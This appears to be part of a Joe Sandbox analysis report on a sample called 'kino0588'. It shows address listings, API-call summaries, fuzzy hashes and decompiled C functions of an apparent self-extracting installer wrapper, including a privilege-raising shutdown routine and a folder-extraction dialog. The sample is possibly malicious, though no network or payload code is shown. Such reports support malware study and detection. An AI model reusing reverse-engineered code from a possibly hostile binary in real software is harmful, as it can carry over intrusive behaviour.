                                                                                                                                                                                                                                    0x0019615c
                                                                                                                                                                                                                                    0x00196170
                                                                                                                                                                                                                                    0x00196172
                                                                                                                                                                                                                                    0x0019617c
                                                                                                                                                                                                                                    0x00196190
                                                                                                                                                                                                                                    0x00196190
                                                                                                                                                                                                                                    0x00196196
                                                                                                                                                                                                                                    0x001961a5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001961ab
                                                                                                                                                                                                                                    0x001961b9
                                                                                                                                                                                                                                    0x001961c6
                                                                                                                                                                                                                                    0x001961c6
                                                                                                                                                                                                                                    0x0019617e
                                                                                                                                                                                                                                    0x00196180
                                                                                                                                                                                                                                    0x0019618a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019618a
                                                                                                                                                                                                                                    0x0019615e
                                                                                                                                                                                                                                    0x00196160
                                                                                                                                                                                                                                    0x0019616a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019616a
                                                                                                                                                                                                                                    0x0019615c
                                                                                                                                                                                                                                    0x0019614a
                                                                                                                                                                                                                                    0x0019610b
                                                                                                                                                                                                                                    0x0019610e
                                                                                                                                                                                                                                    0x0019610e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e59
                                                                                                                                                                                                                                    0x00195e59
                                                                                                                                                                                                                                    0x00195e5c
                                                                                                                                                                                                                                    0x0019604f
                                                                                                                                                                                                                                    0x00196056
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019605c
                                                                                                                                                                                                                                    0x0019606e
                                                                                                                                                                                                                                    0x00196071
                                                                                                                                                                                                                                    0x00196073
                                                                                                                                                                                                                                    0x00196075
                                                                                                                                                                                                                                    0x00196075
                                                                                                                                                                                                                                    0x00196078
                                                                                                                                                                                                                                    0x00196078
                                                                                                                                                                                                                                    0x0019607a
                                                                                                                                                                                                                                    0x0019607b
                                                                                                                                                                                                                                    0x00196081
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196087
                                                                                                                                                                                                                                    0x00196087
                                                                                                                                                                                                                                    0x0019608d
                                                                                                                                                                                                                                    0x0019609c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001960a2
                                                                                                                                                                                                                                    0x001960aa
                                                                                                                                                                                                                                    0x001960b2
                                                                                                                                                                                                                                    0x001960b7
                                                                                                                                                                                                                                    0x001960bd
                                                                                                                                                                                                                                    0x001960bf
                                                                                                                                                                                                                                    0x001960bf
                                                                                                                                                                                                                                    0x001960d6
                                                                                                                                                                                                                                    0x001960e0
                                                                                                                                                                                                                                    0x001960e7
                                                                                                                                                                                                                                    0x001960f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001960f5
                                                                                                                                                                                                                                    0x0019609c
                                                                                                                                                                                                                                    0x00196081
                                                                                                                                                                                                                                    0x00195e62
                                                                                                                                                                                                                                    0x00195e62
                                                                                                                                                                                                                                    0x00195e65
                                                                                                                                                                                                                                    0x00195fd3
                                                                                                                                                                                                                                    0x00195fe9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195fef
                                                                                                                                                                                                                                    0x00195fef
                                                                                                                                                                                                                                    0x00195ff7
                                                                                                                                                                                                                                    0x00195ffd
                                                                                                                                                                                                                                    0x00196003
                                                                                                                                                                                                                                    0x00196006
                                                                                                                                                                                                                                    0x00196011
                                                                                                                                                                                                                                    0x00196014
                                                                                                                                                                                                                                    0x0019603d
                                                                                                                                                                                                                                    0x00196016
                                                                                                                                                                                                                                    0x00196018
                                                                                                                                                                                                                                    0x00196019
                                                                                                                                                                                                                                    0x0019601b
                                                                                                                                                                                                                                    0x00196033
                                                                                                                                                                                                                                    0x0019601d
                                                                                                                                                                                                                                    0x00196020
                                                                                                                                                                                                                                    0x00196029
                                                                                                                                                                                                                                    0x00196022
                                                                                                                                                                                                                                    0x00196022
                                                                                                                                                                                                                                    0x00196022
                                                                                                                                                                                                                                    0x00196020
                                                                                                                                                                                                                                    0x0019601b
                                                                                                                                                                                                                                    0x00196042
                                                                                                                                                                                                                                    0x00196044
                                                                                                                                                                                                                                    0x00196046
                                                                                                                                                                                                                                    0x0019604a
                                                                                                                                                                                                                                    0x00195ff7
                                                                                                                                                                                                                                    0x00195fd5
                                                                                                                                                                                                                                    0x00195fd8
                                                                                                                                                                                                                                    0x00195fd8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e6b
                                                                                                                                                                                                                                    0x00195e6b
                                                                                                                                                                                                                                    0x00195e6e
                                                                                                                                                                                                                                    0x00195f8b
                                                                                                                                                                                                                                    0x00195f99
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195f9f
                                                                                                                                                                                                                                    0x00195fa7
                                                                                                                                                                                                                                    0x00195faf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195fb1
                                                                                                                                                                                                                                    0x00195fb3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195fb5
                                                                                                                                                                                                                                    0x00195fb7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195fb9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195fb9
                                                                                                                                                                                                                                    0x00195fb7
                                                                                                                                                                                                                                    0x00195fb3
                                                                                                                                                                                                                                    0x00195faf
                                                                                                                                                                                                                                    0x00195f8d
                                                                                                                                                                                                                                    0x00195f8d
                                                                                                                                                                                                                                    0x00195f8d
                                                                                                                                                                                                                                    0x00195f8f
                                                                                                                                                                                                                                    0x00195fc1
                                                                                                                                                                                                                                    0x00195fc1
                                                                                                                                                                                                                                    0x00195fc1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e74
                                                                                                                                                                                                                                    0x00195e74
                                                                                                                                                                                                                                    0x00195e77
                                                                                                                                                                                                                                    0x00195ea0
                                                                                                                                                                                                                                    0x00195ebd
                                                                                                                                                                                                                                    0x00195f79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195f7f
                                                                                                                                                                                                                                    0x00195ec3
                                                                                                                                                                                                                                    0x00195ec3
                                                                                                                                                                                                                                    0x00195ecc
                                                                                                                                                                                                                                    0x00195ed4
                                                                                                                                                                                                                                    0x00195ed6
                                                                                                                                                                                                                                    0x00195edc
                                                                                                                                                                                                                                    0x00195edf
                                                                                                                                                                                                                                    0x00195eea
                                                                                                                                                                                                                                    0x00195eed
                                                                                                                                                                                                                                    0x00195f3f
                                                                                                                                                                                                                                    0x00195f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195eef
                                                                                                                                                                                                                                    0x00195eef
                                                                                                                                                                                                                                    0x00195ef2
                                                                                                                                                                                                                                    0x00195f34
                                                                                                                                                                                                                                    0x00195ef4
                                                                                                                                                                                                                                    0x00195ef4
                                                                                                                                                                                                                                    0x00195ef7
                                                                                                                                                                                                                                    0x00195f2b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195ef9
                                                                                                                                                                                                                                    0x00195ef9
                                                                                                                                                                                                                                    0x00195efc
                                                                                                                                                                                                                                    0x00195f22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195efe
                                                                                                                                                                                                                                    0x00195eff
                                                                                                                                                                                                                                    0x00195f02
                                                                                                                                                                                                                                    0x00195f16
                                                                                                                                                                                                                                    0x00195f04
                                                                                                                                                                                                                                    0x00195f07
                                                                                                                                                                                                                                    0x00195f0d
                                                                                                                                                                                                                                    0x00195f46
                                                                                                                                                                                                                                    0x00195f46
                                                                                                                                                                                                                                    0x00195f09
                                                                                                                                                                                                                                    0x00195f09
                                                                                                                                                                                                                                    0x00195f09
                                                                                                                                                                                                                                    0x00195f07
                                                                                                                                                                                                                                    0x00195f02
                                                                                                                                                                                                                                    0x00195efc
                                                                                                                                                                                                                                    0x00195ef7
                                                                                                                                                                                                                                    0x00195ef2
                                                                                                                                                                                                                                    0x00195f4c
                                                                                                                                                                                                                                    0x00195f4e
                                                                                                                                                                                                                                    0x00195f50
                                                                                                                                                                                                                                    0x00195f54
                                                                                                                                                                                                                                    0x00195ed4
                                                                                                                                                                                                                                    0x00195ea2
                                                                                                                                                                                                                                    0x00195ea4
                                                                                                                                                                                                                                    0x00195eaf
                                                                                                                                                                                                                                    0x00195eaf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e79
                                                                                                                                                                                                                                    0x00195e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e83
                                                                                                                                                                                                                                    0x00195e83
                                                                                                                                                                                                                                    0x00195e83
                                                                                                                                                                                                                                    0x00195e85
                                                                                                                                                                                                                                    0x00195e85
                                                                                                                                                                                                                                    0x00195e8e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e94
                                                                                                                                                                                                                                    0x00195e8e
                                                                                                                                                                                                                                    0x00195e7d
                                                                                                                                                                                                                                    0x00195e77
                                                                                                                                                                                                                                    0x00195e6e
                                                                                                                                                                                                                                    0x00195e65
                                                                                                                                                                                                                                    0x00195e5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195dd0
                                                                                                                                                                                                                                    0x00195dd0
                                                                                                                                                                                                                                    0x00195dd0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195dd0
                                                                                                                                                                                                                                    0x00195dce
                                                                                                                                                                                                                                    0x00195dca
                                                                                                                                                                                                                                    0x00195dba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d00
                                                                                                                                                                                                                                    0x00195dd9
                                                                                                                                                                                                                                    0x00195e04
                                                                                                                                                                                                                                    0x001961fe
                                                                                                                                                                                                                                    0x00195e0a
                                                                                                                                                                                                                                    0x00195e0c
                                                                                                                                                                                                                                    0x00195e17
                                                                                                                                                                                                                                    0x00195e17
                                                                                                                                                                                                                                    0x00195e04
                                                                                                                                                                                                                                    0x00196200
                                                                                                                                                                                                                                    0x00196200
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 00195CEE
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00198B3E,00000104,00000000,?,?), ref: 00195DFC
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00195E3E
                                                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 00195EE1
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00195F6F
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00195FA7
                                                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 00196008
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 001960AA
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00191140,00000000,00000040,00000000), ref: 001961F1
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 001961F8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                    • Opcode ID: 97534eba6af142cc1fcd3bb5e89400cf6a31d822944c51acd51f1c8af4e07a9d
                                                                                                                                                                                                                                    • Instruction ID: 768b72f0bf2851c00e21258906463041b1326adb6e38f7157cf0059e65d4861f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97534eba6af142cc1fcd3bb5e89400cf6a31d822944c51acd51f1c8af4e07a9d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0D17971A04A545EDF3B8B3C8C487BA7BA3AB16340F1800AAD486F7590DB758EC6CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00191F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                                                    			E00191F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x199a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x198004; // 0x21bd9a3c
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E001944B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00196CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E001944B9(0, 0x522, 0x191140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00191EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                                                    0x00191f90
                                                                                                                                                                                                                                    0x00191f90
                                                                                                                                                                                                                                    0x00191f93
                                                                                                                                                                                                                                    0x00191f98
                                                                                                                                                                                                                                    0x00191fa4
                                                                                                                                                                                                                                    0x00191fa7
                                                                                                                                                                                                                                    0x00191fc5
                                                                                                                                                                                                                                    0x00191fcd
                                                                                                                                                                                                                                    0x00191fdb
                                                                                                                                                                                                                                    0x00191ee5
                                                                                                                                                                                                                                    0x00191eea
                                                                                                                                                                                                                                    0x00191ef1
                                                                                                                                                                                                                                    0x00191ef4
                                                                                                                                                                                                                                    0x00191f0c
                                                                                                                                                                                                                                    0x00191f2e
                                                                                                                                                                                                                                    0x00191f3a
                                                                                                                                                                                                                                    0x00191f46
                                                                                                                                                                                                                                    0x00191f4d
                                                                                                                                                                                                                                    0x00191f58
                                                                                                                                                                                                                                    0x00191f60
                                                                                                                                                                                                                                    0x00191f61
                                                                                                                                                                                                                                    0x00191f62
                                                                                                                                                                                                                                    0x00191f75
                                                                                                                                                                                                                                    0x00191f80
                                                                                                                                                                                                                                    0x00191f77
                                                                                                                                                                                                                                    0x00191f77
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191f77
                                                                                                                                                                                                                                    0x00191f64
                                                                                                                                                                                                                                    0x00191f64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191f64
                                                                                                                                                                                                                                    0x00191f0e
                                                                                                                                                                                                                                    0x00191f0e
                                                                                                                                                                                                                                    0x00191f13
                                                                                                                                                                                                                                    0x00191f13
                                                                                                                                                                                                                                    0x00191f14
                                                                                                                                                                                                                                    0x00191f14
                                                                                                                                                                                                                                    0x00191f16
                                                                                                                                                                                                                                    0x00191f17
                                                                                                                                                                                                                                    0x00191f1a
                                                                                                                                                                                                                                    0x00191f1f
                                                                                                                                                                                                                                    0x00191f1f
                                                                                                                                                                                                                                    0x00191f86
                                                                                                                                                                                                                                    0x00191f8f
                                                                                                                                                                                                                                    0x00191fcf
                                                                                                                                                                                                                                    0x00191fd3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191fd3
                                                                                                                                                                                                                                    0x00191fa9
                                                                                                                                                                                                                                    0x00191fb4
                                                                                                                                                                                                                                    0x00191fbb
                                                                                                                                                                                                                                    0x00191fc3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191fc3
                                                                                                                                                                                                                                    0x00191f9a
                                                                                                                                                                                                                                    0x00191f9a
                                                                                                                                                                                                                                    0x00191fa2
                                                                                                                                                                                                                                    0x00191fd9
                                                                                                                                                                                                                                    0x00191fda
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191fa2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00191EFB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00191F02
                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00191FD3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                    • Opcode ID: ebefc94ccfa6fc6b04ac4357c705b4c5658b54c611d5d0a9b62f8cd4f334f20b
                                                                                                                                                                                                                                    • Instruction ID: d0f139e15bc83f5da5b52e254d6be2494f71eb7586dc1cfd0f5019765fa33a85
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebefc94ccfa6fc6b04ac4357c705b4c5658b54c611d5d0a9b62f8cd4f334f20b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71210B71B4020A7BDF205BA19C4AFBF77B8EF85B10F10002AFA02D6580D77488C992A1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00196CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00196CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                                                    0x00196cf7
                                                                                                                                                                                                                                    0x00196d00
                                                                                                                                                                                                                                    0x00196d19

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00196E26,00191000), ref: 00196CF7
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00196E26,?,00196E26,00191000), ref: 00196D00
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00196E26,00191000), ref: 00196D0B
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00196E26,00191000), ref: 00196D12
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                                    • Opcode ID: a1eab604a4228a21b5fe432c9635e3af7311db3b12f1968d0795dbc3f5ea14b4
                                                                                                                                                                                                                                    • Instruction ID: 989bc9a4ef8fd59f20806acb45ebecb826dc33fe7fc9c92af6bf81585005b17a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1eab604a4228a21b5fe432c9635e3af7311db3b12f1968d0795dbc3f5ea14b4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CD0C932000108BBDB002BE1EC0CA593F28EF88212F844022F31982830CA3244958B93
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00193210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                                                    			E00193210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E001943D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x199a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1991e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E001944B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x1991e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x1991e5 - 3;
						if(_t49 - 0x1991e5 < 3) {
							goto L32;
						}
						_t24 =  *0x1991e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x1991e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0019658A(0x1991e4, 0x104, 0x191140);
								_t27 = E001958C8(0x1991e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x1991e4 - 0x5c;
									if( *0x1991e4 != 0x5c) {
										L30:
										_t30 = E0019597D(0x1991e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x1991e5 - 0x5c;
									if( *0x1991e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E001944B9(_t64, 0x54a, 0x1991e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x1991e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x1991e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x1991e4 - 0x5c;
						if( *0x1991e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x199124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x199a3c, 0x3e8, 0x198598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00194224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1987a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E001944B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                    0x0019321b
                                                                                                                                                                                                                                    0x0019321e
                                                                                                                                                                                                                                    0x00193221
                                                                                                                                                                                                                                    0x0019343c
                                                                                                                                                                                                                                    0x0019343e
                                                                                                                                                                                                                                    0x0019343f
                                                                                                                                                                                                                                    0x00193445
                                                                                                                                                                                                                                    0x00193447
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193447
                                                                                                                                                                                                                                    0x00193229
                                                                                                                                                                                                                                    0x0019322a
                                                                                                                                                                                                                                    0x0019322f
                                                                                                                                                                                                                                    0x001933ec
                                                                                                                                                                                                                                    0x001933f7
                                                                                                                                                                                                                                    0x00193410
                                                                                                                                                                                                                                    0x00193416
                                                                                                                                                                                                                                    0x0019341d
                                                                                                                                                                                                                                    0x0019342d
                                                                                                                                                                                                                                    0x0019342d
                                                                                                                                                                                                                                    0x00193438
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193438
                                                                                                                                                                                                                                    0x00193237
                                                                                                                                                                                                                                    0x00193243
                                                                                                                                                                                                                                    0x00193243
                                                                                                                                                                                                                                    0x00193246
                                                                                                                                                                                                                                    0x001932ee
                                                                                                                                                                                                                                    0x001932f4
                                                                                                                                                                                                                                    0x001932f6
                                                                                                                                                                                                                                    0x001933d4
                                                                                                                                                                                                                                    0x001933d6
                                                                                                                                                                                                                                    0x001933db
                                                                                                                                                                                                                                    0x001933dc
                                                                                                                                                                                                                                    0x001933de
                                                                                                                                                                                                                                    0x001933df
                                                                                                                                                                                                                                    0x00193370
                                                                                                                                                                                                                                    0x00193372
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193372
